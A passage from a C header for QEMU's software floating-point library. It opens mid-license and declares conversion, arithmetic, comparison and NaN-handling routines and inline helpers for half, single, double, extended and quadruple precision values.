are met: * * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * 3. Neither the name of the copyright holder nor the names of its contributors * may be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGE. */ /* Portions of this work are licensed under the terms of the GNU GPL, * version 2 or later. See the COPYING file in the top-level directory. 
*/ #ifndef SOFTFLOAT_H #define SOFTFLOAT_H /*---------------------------------------------------------------------------- | Software IEC/IEEE floating-point ordering relations *----------------------------------------------------------------------------*/ enum { float_relation_less = -1, float_relation_equal = 0, float_relation_greater = 1, float_relation_unordered = 2 }; #include "fpu/softfloat-types.h" #include "fpu/softfloat-helpers.h" /*---------------------------------------------------------------------------- | Routine to raise any or all of the software IEC/IEEE floating-point | exception flags. *----------------------------------------------------------------------------*/ void float_raise(uint8_t flags, float_status *status); /*---------------------------------------------------------------------------- | If `a' is denormal and we are in flush-to-zero mode then set the | input-denormal exception and return zero. Otherwise just return the value. *----------------------------------------------------------------------------*/ float16 float16_squash_input_denormal(float16 a, float_status *status); float32 float32_squash_input_denormal(float32 a, float_status *status); float64 float64_squash_input_denormal(float64 a, float_status *status); /*---------------------------------------------------------------------------- | Options to indicate which negations to perform in float*_muladd() | Using these differs from negating an input or output before calling | the muladd function in that this means that a NaN doesn't have its | sign bit inverted before it is propagated. | We also support halving the result before rounding, as a special | case to support the ARM fused-sqrt-step instruction FRSQRTS. *----------------------------------------------------------------------------*/ enum { float_muladd_negate_c = 1, float_muladd_negate_product = 2, float_muladd_negate_result = 4, float_muladd_halve_result = 8, }; /*---------------------------------------------------------------------------- | Software IEC/IEEE integer-to-floating-point conversion routines. 
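| A usage sketch (illustrative only, not normative; assumes a
| zero-initialised float_status, which selects round-to-nearest-even):
|     float_status st = { 0 };
|     float32 a = int32_to_float32(42, &st);            yields 42.0, exact
|     float32 b = int64_to_float32_scalbn(3, 4, &st);   yields 3 * 2^4 = 48.0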
*----------------------------------------------------------------------------*/ float16 int16_to_float16_scalbn(int16_t a, int, float_status *status); float16 int32_to_float16_scalbn(int32_t a, int, float_status *status); float16 int64_to_float16_scalbn(int64_t a, int, float_status *status); float16 uint16_to_float16_scalbn(uint16_t a, int, float_status *status); float16 uint32_to_float16_scalbn(uint32_t a, int, float_status *status); float16 uint64_to_float16_scalbn(uint64_t a, int, float_status *status); float16 int16_to_float16(int16_t a, float_status *status); float16 int32_to_float16(int32_t a, float_status *status); float16 int64_to_float16(int64_t a, float_status *status); float16 uint16_to_float16(uint16_t a, float_status *status); float16 uint32_to_float16(uint32_t a, float_status *status); float16 uint64_to_float16(uint64_t a, float_status *status); float32 int16_to_float32_scalbn(int16_t, int, float_status *status); float32 int32_to_float32_scalbn(int32_t, int, float_status *status); float32 int64_to_float32_scalbn(int64_t, int, float_status *status); float32 uint16_to_float32_scalbn(uint16_t, int, float_status *status); float32 uint32_to_float32_scalbn(uint32_t, int, float_status *status); float32 uint64_to_float32_scalbn(uint64_t, int, float_status *status); float32 int16_to_float32(int16_t, float_status *status); float32 int32_to_float32(int32_t, float_status *status); float32 int64_to_float32(int64_t, float_status *status); float32 uint16_to_float32(uint16_t, float_status *status); float32 uint32_to_float32(uint32_t, float_status *status); float32 uint64_to_float32(uint64_t, float_status *status); float64 int16_to_float64_scalbn(int16_t, int, float_status *status); float64 int32_to_float64_scalbn(int32_t, int, float_status *status); float64 int64_to_float64_scalbn(int64_t, int, float_status *status); float64 uint16_to_float64_scalbn(uint16_t, int, float_status *status); float64 uint32_to_float64_scalbn(uint32_t, int, float_status *status); float64 uint64_to_float64_scalbn(uint64_t, int, float_status *status); float64 int16_to_float64(int16_t, float_status *status); float64 int32_to_float64(int32_t, float_status *status); float64 int64_to_float64(int64_t, float_status *status); float64 uint16_to_float64(uint16_t, float_status *status); float64 uint32_to_float64(uint32_t, float_status *status); float64 uint64_to_float64(uint64_t, float_status *status); floatx80 int32_to_floatx80(int32_t, float_status *status); floatx80 int64_to_floatx80(int64_t, float_status *status); float128 int32_to_float128(int32_t, float_status *status); float128 int64_to_float128(int64_t, float_status *status); float128 uint64_to_float128(uint64_t, float_status *status); /*---------------------------------------------------------------------------- | Software half-precision conversion routines. 
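| Sketch (illustrative; assumes the usual QEMU meaning of the `ieee' flag:
| true selects IEEE-754 binary16, false the ARM alternative half-precision
| format, which has no Inf/NaN encodings):
|     float_status st = { 0 };
|     float32 f = float16_to_float32(float16_one, true, &st);   yields 1.0
| where float16_one is the constant defined later in this header.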
*----------------------------------------------------------------------------*/ float16 float32_to_float16(float32, bool ieee, float_status *status); float32 float16_to_float32(float16, bool ieee, float_status *status); float16 float64_to_float16(float64 a, bool ieee, float_status *status); float64 float16_to_float64(float16 a, bool ieee, float_status *status); int16_t float16_to_int16_scalbn(float16, int, int, float_status *status); int32_t float16_to_int32_scalbn(float16, int, int, float_status *status); int64_t float16_to_int64_scalbn(float16, int, int, float_status *status); int16_t float16_to_int16(float16, float_status *status); int32_t float16_to_int32(float16, float_status *status); int64_t float16_to_int64(float16, float_status *status); int16_t float16_to_int16_round_to_zero(float16, float_status *status); int32_t float16_to_int32_round_to_zero(float16, float_status *status); int64_t float16_to_int64_round_to_zero(float16, float_status *status); uint16_t float16_to_uint16_scalbn(float16 a, int, int, float_status *status); uint32_t float16_to_uint32_scalbn(float16 a, int, int, float_status *status); uint64_t float16_to_uint64_scalbn(float16 a, int, int, float_status *status); uint16_t float16_to_uint16(float16 a, float_status *status); uint32_t float16_to_uint32(float16 a, float_status *status); uint64_t float16_to_uint64(float16 a, float_status *status); uint16_t float16_to_uint16_round_to_zero(float16 a, float_status *status); uint32_t float16_to_uint32_round_to_zero(float16 a, float_status *status); uint64_t float16_to_uint64_round_to_zero(float16 a, float_status *status); /*---------------------------------------------------------------------------- | Software half-precision operations. *----------------------------------------------------------------------------*/ float16 float16_round_to_int(float16, float_status *status); float16 float16_add(float16, float16, float_status *status); float16 float16_sub(float16, float16, float_status *status); float16 float16_mul(float16, float16, float_status *status); float16 float16_muladd(float16, float16, float16, int, float_status *status); float16 float16_div(float16, float16, float_status *status); float16 float16_scalbn(float16, int, float_status *status); float16 float16_min(float16, float16, float_status *status); float16 float16_max(float16, float16, float_status *status); float16 float16_minnum(float16, float16, float_status *status); float16 float16_maxnum(float16, float16, float_status *status); float16 float16_minnummag(float16, float16, float_status *status); float16 float16_maxnummag(float16, float16, float_status *status); float16 float16_sqrt(float16, float_status *status); int float16_compare(float16, float16, float_status *status); int float16_compare_quiet(float16, float16, float_status *status); int float16_is_quiet_nan(float16, float_status *status); int float16_is_signaling_nan(float16, float_status *status); float16 float16_silence_nan(float16, float_status *status); static inline int float16_is_any_nan(float16 a) { return ((float16_val(a) & ~0x8000) > 0x7c00); } static inline int float16_is_neg(float16 a) { return float16_val(a) >> 15; } static inline int float16_is_infinity(float16 a) { return (float16_val(a) & 0x7fff) == 0x7c00; } static inline int float16_is_zero(float16 a) { return (float16_val(a) & 0x7fff) == 0; } static inline int float16_is_zero_or_denormal(float16 a) { return (float16_val(a) & 0x7c00) == 0; } static inline float16 float16_abs(float16 a) { /* Note that abs does *not* handle NaN specially, 
nor does * it flush denormal inputs to zero. */ return make_float16(float16_val(a) & 0x7fff); } static inline float16 float16_chs(float16 a) { /* Note that chs does *not* handle NaN specially, nor does * it flush denormal inputs to zero. */ return make_float16(float16_val(a) ^ 0x8000); } static inline float16 float16_set_sign(float16 a, int sign) { return make_float16((float16_val(a) & 0x7fff) | (sign << 15)); } #define float16_zero make_float16(0) #define float16_half make_float16(0x3800) #define float16_one make_float16(0x3c00) #define float16_one_point_five make_float16(0x3e00) #define float16_two make_float16(0x4000) #define float16_three make_float16(0x4200) #define float16_infinity make_float16(0x7c00) /*---------------------------------------------------------------------------- | The pattern for a default generated half-precision NaN. *----------------------------------------------------------------------------*/ float16 float16_default_nan(float_status *status); /*---------------------------------------------------------------------------- | Software IEC/IEEE single-precision conversion routines. *----------------------------------------------------------------------------*/ int16_t float32_to_int16_scalbn(float32, int, int, float_status *status); int32_t float32_to_int32_scalbn(float32, int, int, float_status *status); int64_t float32_to_int64_scalbn(float32, int, int, float_status *status); int16_t float32_to_int16(float32, float_status *status); int32_t float32_to_int32(float32, float_status *status); int64_t float32_to_int64(float32, float_status *status); int16_t float32_to_int16_round_to_zero(float32, float_status *status); int32_t float32_to_int32_round_to_zero(float32, float_status *status); int64_t float32_to_int64_round_to_zero(float32, float_status *status); uint16_t float32_to_uint16_scalbn(float32, int, int, float_status *status); uint32_t float32_to_uint32_scalbn(float32, int, int, float_status *status); uint64_t float32_to_uint64_scalbn(float32, int, int, float_status *status); uint16_t float32_to_uint16(float32, float_status *status); uint32_t float32_to_uint32(float32, float_status *status); uint64_t float32_to_uint64(float32, float_status *status); uint16_t float32_to_uint16_round_to_zero(float32, float_status *status); uint32_t float32_to_uint32_round_to_zero(float32, float_status *status); uint64_t float32_to_uint64_round_to_zero(float32, float_status *status); float64 float32_to_float64(float32, float_status *status); floatx80 float32_to_floatx80(float32, float_status *status); float128 float32_to_float128(float32, float_status *status); /*---------------------------------------------------------------------------- | Software IEC/IEEE single-precision operations. 
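| Sketch of the float_muladd flags declared earlier (illustrative only;
| float32_one/two/three are the constants defined below):
|     float_status st = { 0 };
|     float32 r = float32_muladd(float32_two, float32_three, float32_one,
|                                float_muladd_negate_c, &st);
| computes 2.0 * 3.0 - 1.0 = 5.0; unlike negating c by hand, a NaN in c
| would propagate with its sign bit untouched.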
*----------------------------------------------------------------------------*/ float32 float32_round_to_int(float32, float_status *status); float32 float32_add(float32, float32, float_status *status); float32 float32_sub(float32, float32, float_status *status); float32 float32_mul(float32, float32, float_status *status); float32 float32_div(float32, float32, float_status *status); float32 float32_rem(float32, float32, float_status *status); float32 float32_muladd(float32, float32, float32, int, float_status *status); float32 float32_sqrt(float32, float_status *status); float32 float32_exp2(float32, float_status *status); float32 float32_log2(float32, float_status *status); int float32_eq(float32, float32, float_status *status); int float32_le(float32, float32, float_status *status); int float32_lt(float32, float32, float_status *status); int float32_unordered(float32, float32, float_status *status); int float32_eq_quiet(float32, float32, float_status *status); int float32_le_quiet(float32, float32, float_status *status); int float32_lt_quiet(float32, float32, float_status *status); int float32_unordered_quiet(float32, float32, float_status *status); int float32_compare(float32, float32, float_status *status); int float32_compare_quiet(float32, float32, float_status *status); float32 float32_min(float32, float32, float_status *status); float32 float32_max(float32, float32, float_status *status); float32 float32_minnum(float32, float32, float_status *status); float32 float32_maxnum(float32, float32, float_status *status); float32 float32_minnummag(float32, float32, float_status *status); float32 float32_maxnummag(float32, float32, float_status *status); int float32_is_quiet_nan(float32, float_status *status); int float32_is_signaling_nan(float32, float_status *status); float32 float32_silence_nan(float32, float_status *status); float32 float32_scalbn(float32, int, float_status *status); static inline float32 float32_abs(float32 a) { /* Note that abs does *not* handle NaN specially, nor does * it flush denormal inputs to zero. */ return make_float32(float32_val(a) & 0x7fffffff); } static inline float32 float32_chs(float32 a) { /* Note that chs does *not* handle NaN specially, nor does * it flush denormal inputs to zero. 
*/ return make_float32(float32_val(a) ^ 0x80000000); } static inline int float32_is_infinity(float32 a) { return (float32_val(a) & 0x7fffffff) == 0x7f800000; } static inline int float32_is_neg(float32 a) { return float32_val(a) >> 31; } static inline int float32_is_zero(float32 a) { return (float32_val(a) & 0x7fffffff) == 0; } static inline int float32_is_any_nan(float32 a) { return ((float32_val(a) & ~(1 << 31)) > 0x7f800000UL); } static inline int float32_is_zero_or_denormal(float32 a) { return (float32_val(a) & 0x7f800000) == 0; } static inline bool float32_is_normal(float32 a) { return (((float32_val(a) >> 23) + 1) & 0xff) >= 2; } static inline bool float32_is_denormal(float32 a) { return float32_is_zero_or_denormal(a) && !float32_is_zero(a); } static inline bool float32_is_zero_or_normal(float32 a) { return float32_is_normal(a) || float32_is_zero(a); } static inline float32 float32_set_sign(float32 a, int sign) { return make_float32((float32_val(a) & 0x7fffffff) | (sign << 31)); } #define float32_zero make_float32(0) #define float32_half make_float32(0x3f000000) #define float32_one make_float32(0x3f800000) #define float32_one_point_five make_float32(0x3fc00000) #define float32_two make_float32(0x40000000) #define float32_three make_float32(0x40400000) #define float32_infinity make_float32(0x7f800000) /*---------------------------------------------------------------------------- | Packs the sign `zSign', exponent `zExp', and significand `zSig' into a | single-precision floating-point value, returning the result. After being | shifted into the proper positions, the three fields are simply added | together to form the result. This means that any integer portion of `zSig' | will be added into the exponent. Since a properly normalized significand | will have an integer portion equal to 1, the `zExp' input should be 1 less | than the desired result exponent whenever `zSig' is a complete, normalized | significand. *----------------------------------------------------------------------------*/ static inline float32 packFloat32(flag zSign, int zExp, uint32_t zSig) { return make_float32( (((uint32_t)zSign) << 31) + (((uint32_t)zExp) << 23) + zSig); } /*---------------------------------------------------------------------------- | The pattern for a default generated single-precision NaN. *----------------------------------------------------------------------------*/ float32 float32_default_nan(float_status *status); /*---------------------------------------------------------------------------- | Software IEC/IEEE double-precision conversion routines. 
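| Sketch (illustrative): the round-to-zero conversions truncate and raise
| the inexact flag when bits are discarded:
|     float_status st = { 0 };
|     int64_t i = float64_to_int64_round_to_zero(float64_one_point_five, &st);
| leaves i == 1 and float_flag_inexact set in st.float_exception_flags.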
*----------------------------------------------------------------------------*/ int16_t float64_to_int16_scalbn(float64, int, int, float_status *status); int32_t float64_to_int32_scalbn(float64, int, int, float_status *status); int64_t float64_to_int64_scalbn(float64, int, int, float_status *status); int16_t float64_to_int16(float64, float_status *status); int32_t float64_to_int32(float64, float_status *status); int64_t float64_to_int64(float64, float_status *status); int16_t float64_to_int16_round_to_zero(float64, float_status *status); int32_t float64_to_int32_round_to_zero(float64, float_status *status); int64_t float64_to_int64_round_to_zero(float64, float_status *status); uint16_t float64_to_uint16_scalbn(float64, int, int, float_status *status); uint32_t float64_to_uint32_scalbn(float64, int, int, float_status *status); uint64_t float64_to_uint64_scalbn(float64, int, int, float_status *status); uint16_t float64_to_uint16(float64, float_status *status); uint32_t float64_to_uint32(float64, float_status *status); uint64_t float64_to_uint64(float64, float_status *status); uint16_t float64_to_uint16_round_to_zero(float64, float_status *status); uint32_t float64_to_uint32_round_to_zero(float64, float_status *status); uint64_t float64_to_uint64_round_to_zero(float64, float_status *status); float32 float64_to_float32(float64, float_status *status); floatx80 float64_to_floatx80(float64, float_status *status); float128 float64_to_float128(float64, float_status *status); /*---------------------------------------------------------------------------- | Software IEC/IEEE double-precision operations. *----------------------------------------------------------------------------*/ float64 float64_round_to_int(float64, float_status *status); float64 float64_add(float64, float64, float_status *status); float64 float64_sub(float64, float64, float_status *status); float64 float64_mul(float64, float64, float_status *status); float64 float64_div(float64, float64, float_status *status); float64 float64_rem(float64, float64, float_status *status); float64 float64_muladd(float64, float64, float64, int, float_status *status); float64 float64_sqrt(float64, float_status *status); float64 float64_log2(float64, float_status *status); int float64_eq(float64, float64, float_status *status); int float64_le(float64, float64, float_status *status); int float64_lt(float64, float64, float_status *status); int float64_unordered(float64, float64, float_status *status); int float64_eq_quiet(float64, float64, float_status *status); int float64_le_quiet(float64, float64, float_status *status); int float64_lt_quiet(float64, float64, float_status *status); int float64_unordered_quiet(float64, float64, float_status *status); int float64_compare(float64, float64, float_status *status); int float64_compare_quiet(float64, float64, float_status *status); float64 float64_min(float64, float64, float_status *status); float64 float64_max(float64, float64, float_status *status); float64 float64_minnum(float64, float64, float_status *status); float64 float64_maxnum(float64, float64, float_status *status); float64 float64_minnummag(float64, float64, float_status *status); float64 float64_maxnummag(float64, float64, float_status *status); int float64_is_quiet_nan(float64 a, float_status *status); int float64_is_signaling_nan(float64, float_status *status); float64 float64_silence_nan(float64, float_status *status); float64 float64_scalbn(float64, int, float_status *status); static inline float64 float64_abs(float64 a) { /* Note that abs 
does *not* handle NaN specially, nor does * it flush denormal inputs to zero. */ return make_float64(float64_val(a) & 0x7fffffffffffffffLL); } static inline float64 float64_chs(float64 a) { /* Note that chs does *not* handle NaN specially, nor does * it flush denormal inputs to zero. */ return make_float64(float64_val(a) ^ 0x8000000000000000LL); } static inline int float64_is_infinity(float64 a) { return (float64_val(a) & 0x7fffffffffffffffLL ) == 0x7ff0000000000000LL; } static inline int float64_is_neg(float64 a) { return float64_val(a) >> 63; } static inline int float64_is_zero(float64 a) { return (float64_val(a) & 0x7fffffffffffffffLL) == 0; } static inline int float64_is_any_nan(float64 a) { return ((float64_val(a) & ~(1ULL << 63)) > 0x7ff0000000000000ULL); } static inline int float64_is_zero_or_denormal(float64 a) { return (float64_val(a) & 0x7ff0000000000000LL) == 0; } static inline bool float64_is_normal(float64 a) { return (((float64_val(a) >> 52) + 1) & 0x7ff) >= 2; } static inline bool float64_is_denormal(float64 a) { return float64_is_zero_or_denormal(a) && !float64_is_zero(a); } static inline bool float64_is_zero_or_normal(float64 a) { return float64_is_normal(a) || float64_is_zero(a); } static inline float64 float64_set_sign(float64 a, int sign) { return make_float64((float64_val(a) & 0x7fffffffffffffffULL) | ((int64_t)sign << 63)); } #define float64_zero make_float64(0) #define float64_half make_float64(0x3fe0000000000000LL) #define float64_one make_float64(0x3ff0000000000000LL) #define float64_one_point_five make_float64(0x3FF8000000000000ULL) #define float64_two make_float64(0x4000000000000000ULL) #define float64_three make_float64(0x4008000000000000ULL) #define float64_ln2 make_float64(0x3fe62e42fefa39efLL) #define float64_infinity make_float64(0x7ff0000000000000LL) /*---------------------------------------------------------------------------- | The pattern for a default generated double-precision NaN. *----------------------------------------------------------------------------*/ float64 float64_default_nan(float_status *status); /*---------------------------------------------------------------------------- | Software IEC/IEEE extended double-precision conversion routines. *----------------------------------------------------------------------------*/ int32_t floatx80_to_int32(floatx80, float_status *status); int32_t floatx80_to_int32_round_to_zero(floatx80, float_status *status); int64_t floatx80_to_int64(floatx80, float_status *status); int64_t floatx80_to_int64_round_to_zero(floatx80, float_status *status); float32 floatx80_to_float32(floatx80, float_status *status); float64 floatx80_to_float64(floatx80, float_status *status); float128 floatx80_to_float128(floatx80, float_status *status); /*---------------------------------------------------------------------------- | The pattern for an extended double-precision inf. *----------------------------------------------------------------------------*/ extern const floatx80 floatx80_infinity; /*---------------------------------------------------------------------------- | Software IEC/IEEE extended double-precision operations. 
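| Sketch (illustrative): setting floatx80_rounding_precision to 32 or 64
| narrows results to single/double significand width; any other value
| (80 is conventional) keeps the full 64-bit significand:
|     float_status st = { 0 };
|     st.floatx80_rounding_precision = 80;
|     floatx80 r = floatx80_add(floatx80_one, floatx80_half, &st);   1.5, exact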
*----------------------------------------------------------------------------*/ floatx80 floatx80_round(floatx80 a, float_status *status); floatx80 floatx80_round_to_int(floatx80, float_status *status); floatx80 floatx80_add(floatx80, floatx80, float_status *status); floatx80 floatx80_sub(floatx80, floatx80, float_status *status); floatx80 floatx80_mul(floatx80, floatx80, float_status *status); floatx80 floatx80_div(floatx80, floatx80, float_status *status); floatx80 floatx80_rem(floatx80, floatx80, float_status *status); floatx80 floatx80_sqrt(floatx80, float_status *status); int floatx80_eq(floatx80, floatx80, float_status *status); int floatx80_le(floatx80, floatx80, float_status *status); int floatx80_lt(floatx80, floatx80, float_status *status); int floatx80_unordered(floatx80, floatx80, float_status *status); int floatx80_eq_quiet(floatx80, floatx80, float_status *status); int floatx80_le_quiet(floatx80, floatx80, float_status *status); int floatx80_lt_quiet(floatx80, floatx80, float_status *status); int floatx80_unordered_quiet(floatx80, floatx80, float_status *status); int floatx80_compare(floatx80, floatx80, float_status *status); int floatx80_compare_quiet(floatx80, floatx80, float_status *status); int floatx80_is_quiet_nan(floatx80, float_status *status); int floatx80_is_signaling_nan(floatx80, float_status *status); floatx80 floatx80_silence_nan(floatx80, float_status *status); floatx80 floatx80_scalbn(floatx80, int, float_status *status); static inline floatx80 floatx80_abs(floatx80 a) { a.high &= 0x7fff; return a; } static inline floatx80 floatx80_chs(floatx80 a) { a.high ^= 0x8000; return a; } static inline int floatx80_is_infinity(floatx80 a) { #if defined(TARGET_M68K) return (a.high & 0x7fff) == floatx80_infinity.high && !(a.low << 1); #else return (a.high & 0x7fff) == floatx80_infinity.high && a.low == floatx80_infinity.low; #endif } static inline int floatx80_is_neg(floatx80 a) { return a.high >> 15; } static inline int floatx80_is_zero(floatx80 a) { return (a.high & 0x7fff) == 0 && a.low == 0; } static inline int floatx80_is_zero_or_denormal(floatx80 a) { return (a.high & 0x7fff) == 0; } static inline int floatx80_is_any_nan(floatx80 a) { return ((a.high & 0x7fff) == 0x7fff) && (a.low<<1); } /*---------------------------------------------------------------------------- | Return whether the given value is an invalid floatx80 encoding. | Invalid floatx80 encodings arise when the integer bit is not set, but | the exponent is not zero. The only times the integer bit is permitted to | be zero is in subnormal numbers and the value zero. | This includes what the Intel software developer's manual calls pseudo-NaNs, | pseudo-infinities and un-normal numbers. It does not include | pseudo-denormals, which must still be correctly handled as inputs even | if they are never generated as outputs. *----------------------------------------------------------------------------*/ static inline bool floatx80_invalid_encoding(floatx80 a) { return (a.low & (1ULL << 63)) == 0 && (a.high & 0x7FFF) != 0; } #define floatx80_zero make_floatx80(0x0000, 0x0000000000000000LL) #define floatx80_one make_floatx80(0x3fff, 0x8000000000000000LL) #define floatx80_ln2 make_floatx80(0x3ffe, 0xb17217f7d1cf79acLL) #define floatx80_pi make_floatx80(0x4000, 0xc90fdaa22168c235LL) #define floatx80_half make_floatx80(0x3ffe, 0x8000000000000000LL) /*---------------------------------------------------------------------------- | Returns the fraction bits of the extended double-precision floating-point | value `a'. 
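| For example, extractFloatx80Frac(floatx80_one) is 0x8000000000000000ULL:
| unlike float32/float64, the extended format stores its integer bit
| explicitly in the significand.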
*----------------------------------------------------------------------------*/ static inline uint64_t extractFloatx80Frac(floatx80 a) { return a.low; } /*---------------------------------------------------------------------------- | Returns the exponent bits of the extended double-precision floating-point | value `a'. *----------------------------------------------------------------------------*/ static inline int32_t extractFloatx80Exp(floatx80 a) { return a.high & 0x7FFF; } /*---------------------------------------------------------------------------- | Returns the sign bit of the extended double-precision floating-point value | `a'. *----------------------------------------------------------------------------*/ static inline flag extractFloatx80Sign(floatx80 a) { return a.high >> 15; } /*---------------------------------------------------------------------------- | Packs the sign `zSign', exponent `zExp', and significand `zSig' into an | extended double-precision floating-point value, returning the result. *----------------------------------------------------------------------------*/ static inline floatx80 packFloatx80(flag zSign, int32_t zExp, uint64_t zSig) { floatx80 z; z.low = zSig; z.high = (((uint16_t)zSign) << 15) + zExp; return z; } /*---------------------------------------------------------------------------- | Normalizes the subnormal extended double-precision floating-point value | represented by the denormalized significand `aSig'. The normalized exponent | and significand are stored at the locations pointed to by `zExpPtr' and | `zSigPtr', respectively. *----------------------------------------------------------------------------*/ void normalizeFloatx80Subnormal(uint64_t aSig, int32_t *zExpPtr, uint64_t *zSigPtr); /*---------------------------------------------------------------------------- | Takes two extended double-precision floating-point values `a' and `b', one | of which is a NaN, and returns the appropriate NaN result. If either `a' or | `b' is a signaling NaN, the invalid exception is raised. *----------------------------------------------------------------------------*/ floatx80 propagateFloatx80NaN(floatx80 a, floatx80 b, float_status *status); /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and extended significand formed by the concatenation of `zSig0' and `zSig1', | and returns the proper extended double-precision floating-point value | corresponding to the abstract input. Ordinarily, the abstract value is | rounded and packed into the extended double-precision format, with the | inexact exception raised if the abstract input cannot be represented | exactly. However, if the abstract value is too large, the overflow and | inexact exceptions are raised and an infinity or maximal finite value is | returned. If the abstract value is too small, the input value is rounded to | a subnormal number, and the underflow and inexact exceptions are raised if | the abstract input cannot be represented exactly as a subnormal extended | double-precision floating-point number. | If `roundingPrecision' is 32 or 64, the result is rounded to the same | number of bits as single or double precision, respectively. Otherwise, the | result is rounded to the full precision of the extended double-precision | format. | The input significand must be normalized or smaller. 
If the input | significand is not normalized, `zExp' must be 0; in that case, the result | returned is a subnormal number, and it must not require rounding. The | handling of underflow and overflow follows the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ floatx80 roundAndPackFloatx80(int8_t roundingPrecision, flag zSign, int32_t zExp, uint64_t zSig0, uint64_t zSig1, float_status *status); /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent | `zExp', and significand formed by the concatenation of `zSig0' and `zSig1', | and returns the proper extended double-precision floating-point value | corresponding to the abstract input. This routine is just like | `roundAndPackFloatx80' except that the input significand does not have to be | normalized. *----------------------------------------------------------------------------*/ floatx80 normalizeRoundAndPackFloatx80(int8_t roundingPrecision, flag zSign, int32_t zExp, uint64_t zSig0, uint64_t zSig1, float_status *status); /*---------------------------------------------------------------------------- | The pattern for a default generated extended double-precision NaN. *----------------------------------------------------------------------------*/ floatx80 floatx80_default_nan(float_status *status); /*---------------------------------------------------------------------------- | Software IEC/IEEE quadruple-precision conversion routines. *----------------------------------------------------------------------------*/ int32_t float128_to_int32(float128, float_status *status); int32_t float128_to_int32_round_to_zero(float128, float_status *status); int64_t float128_to_int64(float128, float_status *status); int64_t float128_to_int64_round_to_zero(float128, float_status *status); uint64_t float128_to_uint64(float128, float_status *status); uint64_t float128_to_uint64_round_to_zero(float128, float_status *status); uint32_t float128_to_uint32(float128, float_status *status); uint32_t float128_to_uint32_round_to_zero(float128, float_status *status); float32 float128_to_float32(float128, float_status *status); float64 float128_to_float64(float128, float_status *status); floatx80 float128_to_floatx80(float128, float_status *status); /*---------------------------------------------------------------------------- | Software IEC/IEEE quadruple-precision operations. 
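| Sketch (illustrative) combining the conversion and comparison helpers:
|     float_status st = { 0 };
|     float128 q = int64_to_float128(1, &st);
|     q = float128_add(q, q, &st);
|     int rel = float128_compare(q, int64_to_float128(2, &st), &st);
| leaves rel == float_relation_equal.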
*----------------------------------------------------------------------------*/ float128 float128_round_to_int(float128, float_status *status); float128 float128_add(float128, float128, float_status *status); float128 float128_sub(float128, float128, float_status *status); float128 float128_mul(float128, float128, float_status *status); float128 float128_div(float128, float128, float_status *status); float128 float128_rem(float128, float128, float_status *status); float128 float128_sqrt(float128, float_status *status); int float128_eq(float128, float128, float_status *status); int float128_le(float128, float128, float_status *status); int float128_lt(float128, float128, float_status *status); int float128_unordered(float128, float128, float_status *status); int float128_eq_quiet(float128, float128, float_status *status); int float128_le_quiet(float128, float128, float_status *status); int float128_lt_quiet(float128, float128, float_status *status); int float128_unordered_quiet(float128, float128, float_status *status); int float128_compare(float128, float128, float_status *status); int float128_compare_quiet(float128, float128, float_status *status); int float128_is_quiet_nan(float128, float_status *status); int float128_is_signaling_nan(float128, float_status *status); float128 float128_silence_nan(float128, float_status *status); float128 float128_scalbn(float128, int, float_status *status); static inline float128 float128_abs(float128 a) { a.high &= 0x7fffffffffffffffLL; return a; } static inline float128 float128_chs(float128 a) { a.high ^= 0x8000000000000000LL; return a; } static inline int float128_is_infinity(float128 a) { return (a.high & 0x7fffffffffffffffLL) == 0x7fff000000000000LL && a.low == 0; } static inline int float128_is_neg(float128 a) { return a.high >> 63; } static inline int float128_is_zero(float128 a) { return (a.high & 0x7fffffffffffffffLL) == 0 && a.low == 0; } static inline int float128_is_zero_or_denormal(float128 a) { return (a.high & 0x7fff000000000000LL) == 0; } static inline bool float128_is_normal(float128 a) { return (((a.high >> 48) + 1) & 0x7fff) >= 2; } static inline bool float128_is_denormal(float128 a) { return float128_is_zero_or_denormal(a) && !float128_is_zero(a); } static inline int float128_is_any_nan(float128 a) { return ((a.high >> 48) & 0x7fff) == 0x7fff && ((a.low != 0) || ((a.high & 0xffffffffffffLL) != 0)); } #define float128_zero make_float128(0, 0) /*---------------------------------------------------------------------------- | The pattern for a default generated quadruple-precision NaN. 
*----------------------------------------------------------------------------*/ float128 float128_default_nan(float_status *status); #endif /* SOFTFLOAT_H */
unicorn-2.1.1/qemu/include/hw/core/cpu.h
